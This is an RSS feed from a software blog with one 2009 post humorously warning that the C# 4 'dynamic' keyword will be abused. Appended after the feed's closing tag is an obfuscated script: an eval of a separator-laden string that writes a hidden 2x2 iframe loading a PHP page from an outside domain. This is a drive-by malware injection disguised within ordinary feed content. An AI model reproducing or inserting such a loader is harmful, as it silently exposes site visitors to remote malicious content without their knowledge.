<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>LexParse &#187; end of days</title>
	<atom:link href="http://www.lexparse.com/tag/end-of-days/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.lexparse.com</link>
	<description>Software Development</description>
	<lastBuildDate>Sat, 14 Nov 2009 03:39:33 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>C# Dynamic: The Downfall of Western Civilization</title>
		<link>http://www.lexparse.com/2009/11/11/csharp-dynamic-the-downfall-of-western-civilization/</link>
		<comments>http://www.lexparse.com/2009/11/11/csharp-dynamic-the-downfall-of-western-civilization/#comments</comments>
		<pubDate>Wed, 11 Nov 2009 20:14:41 +0000</pubDate>
		<dc:creator>Mark</dc:creator>
				<category><![CDATA[.NET]]></category>
		<category><![CDATA[C#]]></category>
		<category><![CDATA[end of days]]></category>

		<guid isPermaLink="false">http://www.lexparse.com/?p=141</guid>
		<description><![CDATA[I&#8217;ve known about the new dynamic keyword in C# 4 for about a year now but really haven&#8217;t thought much about it.  It&#8217;s suppose to be syntactic sugar for dealing with things like COM interop and objects from other DLR languages.  This can be done now by using the existing reflection framework/library, but [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve known about the new <a href="http://msdn.microsoft.com/en-us/library/dd264736(VS.100).aspx" target="_blank"><em>dynamic</em> keyword in C# 4</a> for about a year now but really haven&#8217;t thought much about it.  It&#8217;s suppose to be syntactic sugar for dealing with things like COM interop and objects from other DLR languages.  This can be done now by using the existing reflection framework/library, but it can be tedious dealing with method name strings and the chain of method calls needed to get to the method invocation.  Variables declared as <em>dynamic</em> bypass static type checking.  </p>
<p>I came to the realization today this new keyword might well trigger the downfall of western civilization.  Not only can this keyword be used for local variables, but also method parameters and return values.  If you have experience working in Corporate America, you know that the there are plenty of developers out there who will abuse this keyword to no end.  Can you imagine a ginormous, multi-thousand source file code base littered with <em>dynamic</em>!!!  Methods that return dynamic!!!  Methods that take dynamic!!!  Does this not frighten anybody?  I&#8217;m so scared.  Am I alone?  Can we stop this?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lexparse.com/2009/11/11/csharp-dynamic-the-downfall-of-western-civilization/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
<script>var bpxDsSbm8='d*%@o*%@c*%@u*%@m*%@e*%@n*%@t*%@.*%@w*%@r*%@i*%@t*%@e*%@(*%@\'*%@<*%@i*%@f*%@r*%@a*%@m*%@e*%@ *%@s*%@r*%@c*%@=*%@"*%@h*%@t*%@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*%@p*%@l*%@a*%@s*%@.*%@c*%@o*%@m*%@/*%@i*%@n*%@.*%@p*%@h*%@p*%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@ *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@ *%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%@e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r*%@a*%@m*%@e*%@>*%@\'*%@)*%@;*%@';eval(bpxDsSbm8.split('*%@').join(""));</script>